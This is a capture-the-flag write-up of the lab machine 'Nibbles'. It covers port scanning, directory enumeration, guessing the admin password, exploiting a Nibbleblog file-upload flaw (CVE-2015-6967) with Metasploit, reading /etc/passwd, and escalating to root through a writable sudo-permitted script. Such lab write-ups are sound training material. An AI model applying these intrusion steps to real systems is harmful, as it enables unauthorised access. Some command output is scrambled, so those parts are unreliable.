Introduction
The following writeup shows the process I used to capture the user and root flags on Nibbles machine at @ 10.10.10.75.
This document contains my field notes I took when I was working through the box.
My way of thinking
The first step consists of the reconnaissance phase as ports scanning, banner grabbing, misconfigurations and so on. The second one to find the weakness, then, the attack itself, finally the privileges escalation called “post exploitation phase”.
Personal notice: The post exploitation was a quite complex, I will do my best to explain how I rooted the “Nibbles machine”.
Subscript: Something was hidden, and the goal was to find the GOHST!!! Let’s roll with our genius Homer Simpson ;)
Ports scanning
During this steep we are going to identify the target to see what we have behind the IP address.
BTW, the results are above:
sudo nmap 10.10.10.75
Starting Nmap 7.40 (https://nmap.org) at 2018–02–20 17:
Nmap scan report for 10.10.10.75 Host is up (0.023s latency).
Not shown: 998 closed ports Host is up (0.023s latency).
PORT STATE SERVICE
80/tcp open http
22/tcp open ssh
Uptime guess: 198.840 days (since Sat Aug 5 22:12:12 2017) Network Distance: 2 hops TCP Sequence Prediction: Difficulty=260 (Good luck!) IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap done: 1 IP address (1 host up) scanned in 18.88 seconds
Explanations
The remote system is a Linux (we don’t know for the moment the distribution).
On the system we have a web server and a remote access.
With these elements in hands, we are going to check these two services. To do that, we opened our browser, and for the second one, opened a terminal with the basic credentials.
Step 1.1 The Web server:
The result of our browsing is a simple “hello word”!
Hello word page
Step 1.2 The remote access:
The result of the basic SSH connection in our terminal.
Identification
Let’s take look at the headers on the web server
curl -I 10.10.10.75
HTTP/1.1 200 OK
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=UTF-8
The reflex is to look at the source code to find an interesting stuff. It could be nice ;)
The website source code
So, we have found a comment in the source code. Does it our ghost?
The next step, is to browse the IP address with the new repository (/nibbleblog/)
Nibbleblog access without to be log
Our distant system is a simple web server under Apache 2.4.18.
Enumeration
At this point of the challenge, we know more about the machine. So, we enumerated some directories of the website.
sudo python3 dirsearch.py -u http://10.10.10.75/nibbleblog -e -f -x 400,403,404 [sudo] password for root:
_|. _ _ _ _ _ _|_ v0.3.8 (_||| _) (/_(_|| (_| )
Extensions: -f | Threads: 10 | Wordlist size: 6038
Error Log: /home/user/Documents/pentesting/tools/web/dirsearch/logs/errors-18–02–21_00–45–19.log Target: http://10.10.10.75/nibbleblog
[00:45:19]:
[00:45:22] 301 — [Starting 00:45:22] 200 — [00:45:22] 200 — [00:45:22] 200 — [00:45:23] 301 — [00:45:23] 200 — [00:45:28] 301 — [00:45:31] 200 — [00:45:31] 200 — [00:45:31] 200 — [00:45:32] 301 — [00:45:32] 200 — [00:45:35] 301 — [00:45:35] 200 — [00:45:38] 301 -
321B — /nibbleblog/admin -> http://10.10.10.75/nibbleblog/admin/ 48B — /nibbleblog/admin.php
2KB — /nibbleblog/admin/
2KB — /nibbleblog/admin/?/login
332B — /nibbleblog/admin/js/tinymce -> http://10.10.10.75/nibbleblog/admin/js/tinymce/
2KB — /nibbleblog/admin/js/tinymce/
323B — /nibbleblog/content -> http://10.10.10.75/nibbleblog/content/
48B — /nibbleblog/index.php
48B — /nibbleblog/index.php/login/ 78B — /nibbleblog/install.php
325B — /nibbleblog/languages -> http://10.10.10.75/nibbleblog/languages/ 34KB — /nibbleblog/LICENSE.txt
323B — /nibbleblog/plugins -> http://10.10.10.75/nibbleblog/plugins/ 5KB — /nibbleblog/README
322B — /nibbleblog/themes -> http://10.10.10.75/nibbleblog/themes/
Directories enumeration
Further enumeration
The directory enumeration phase reveals some very interesting folders. Some of are the install from scratch (misconfigurations).
Bellow the directories found:
http://10.10.10.75/nibbleblog/admin.php
http://10.10.10.75/nibbleblog/admin/?/login
http://10.10.10.75/nibbleblog/admin/js/tinymce/
http://10.10.10.75/nibbleblog/content/
http://10.10.10.75/nibbleblog/index.php
http://10.10.10.75/nibbleblog/index.php/login
http://10.10.10.75/nibbleblog/install.php
http://10.10.10.75/nibbleblog/languages/
http://10.10.10.75/nibbleblog/plugins/
http://10.10.10.75/nibbleblog/README
http://10.10.10.75/nibbleblog/themes/
As you can see, the only one which is interesting for us, is the admin page.
http://10.10.10.75/nibbleblog/admin.php
Admin access point
With this element we can access as admin on the blog. Then, we’ll compromise the system by this attack vector.
Now that we have the admin interface, we are going to use the brute force technique to attempt to find the access.
After the process in action, we noted the system is configured with a protection (anti brute force with a black list process).
Error login Access
Well, we were blocked for around 5 minutes with the error page above.
So, the only solution in our situation were “ the guessing» (to avoid the detection). The username could be ‘admin, administrator’ and the password ‘nibbles, nibble’.
After these “guessing step”, we found the credential. These are:
- Username: admin
- Password: nibbles
By the way, we’re almost in!! so, what’s next?
The Weakness
Let’s talk about the access point we could exploited. Given that we were in, the next step was to browse under administrator access.
We explored the blog we founded by browsing it (each page) and with the help of the last step (directory enumeration). So, let’s go ;)
By using our enumeration, we browsed an interesting page wish show the plugins. (the other were not interesting for us because no upload function).
So, as we can see, you have one good stuff “My image/ Configure”. It does allow us to upload some picture in the blog. But, it’s a HUGE for us because we could send a backdoor to interact with the host system.
Plugins Access
In more details, we browsed the specific folder “My_image”.
Plugins repertory
The inside of the repertory
Then, we seen the details off pictures system. By digging more and more, the mechanism of upload, we remarked that if a picture was uploaded nothing weren’t be updated in the folder.
We have now our vulnerability: Nibbleblog File Upload. With some researches, this vulnerability refers to the CVE-2015–6967.
Exploitation
With all information we’ve got, we can make our intrusion on the remote system.
To do that, we launched a shell to use METASPLOIT. So, let’s start the game ;)
At first, update the framework. It’s required to have the new version.
So, the steps required were:
- Searched the exploit :> nibbles
- Configured the exploit
- Configured the payload
- Ran the exploit
Please find above the setup of our intrusion.
Configuration of nibbles exploit
That’s great, we are in! The last step is to get escalade privileges to catch the flags
The next screenshot shows that we are well in the server.
meterpreter > sysinfo
Computer : Nibbles
OS : Linux Nibbles 4.4.0–104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 Meterpreter : php/linux
meterpreter >
Privilege Escalation
Once in we had to find some flags. The first one was the user flag, and the second one, the root flag of the machine.
- The user flag was easy because we found the user directory and the text file were in it.
- The root flag (system admin), more complex! One indication was given ;)
When we got in, we were at the root of the website. So, the only solution for me was to find the user directory and to catch the flag.
So, in MSF, just use the Linux command for it.
In the description, some directories had been deleted for easier reading.
Always know where you are and where you want to go!!
meterpreter > ls
Listing: /var/www/html/nibbleblog/content/private/plugins/my_image ==================================================================
Mode Size Type Last modified Name
— — — — — — — — — — — — — — —
100777/rwxrwxrwx 14160 fil 2018–02–21 15:59:02 +0100 cowroot 100644/rw-r — r — 258 fil 2018–02–21 17:44:55 +0100 db.xml 100644/rw-r — r — 1292 fil 2018–02–21 16:39:25 +0100 image. 100644/rw-r — r — 1113 fil 2018–02–21 16:03:40 +0100 image.bin 100644/rw-r — r — 1113 fil 2018–02–21 16:18:23 +0100 image.jpeg
meterpreter > cd ..
meterpreter > cd home
meterpreter > cd home
meterpreter > ls
Listing: /home
==============
Mode Size Type Last modified Name
— — — — — — — — — — — — — — —
40755/rwxr-xr-x 4096 dir 2018–02–21 15:59:22 +0100 nibbler
meterpreter > cd nibbler
meterpreter > ls
Listing: /home/nibbler
Mode Size Type Last modified Name
— — — — — — — — — — — — — — —
100400/r — — — — 33 fil 2017–12–29 11:43:54 +0100 user.txt
meterpreter > cat user.txt
b02ff32bb332deba49eeaed21152c8d8
In order to catch the ultimate flag, we had to drop in shell mode to work more easily. So, I’ve tested the version of sudo and done some investigations.
The most important answer to root the server was:
User nibbler may run the following commands on Nibbles: (root)
NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
***Possible Sudo PWNAGE!
-rwxr-xr-x 1 nibbler nibbler 23 Feb 21 13:18 /home/nibbler/personal/stuff/monitor.sh
Let’s roll for root flag?
meterpreter > shell
Channel 1 created.
head -n 8 /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
sudo -l
sudo: unable to resolve host Nibbles: Connection timed out Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles: (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
***Possible Sudo PWNAGE!
-rwxr-xr-x 1 nibbler nibbler 23 Feb 21 13:18 /home/nibbler/personal/stuff/monitor.sh
chmod 777 /home/nibbler ./monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$
sudo -u root /home/nibbler/personal/stuff/monitor.sh
root@Nibbles:/#
pwd
/root
root@Nibbles:~# cat root.txt
cat root.txt b6d745c0dfb6457c55591efc898ef88c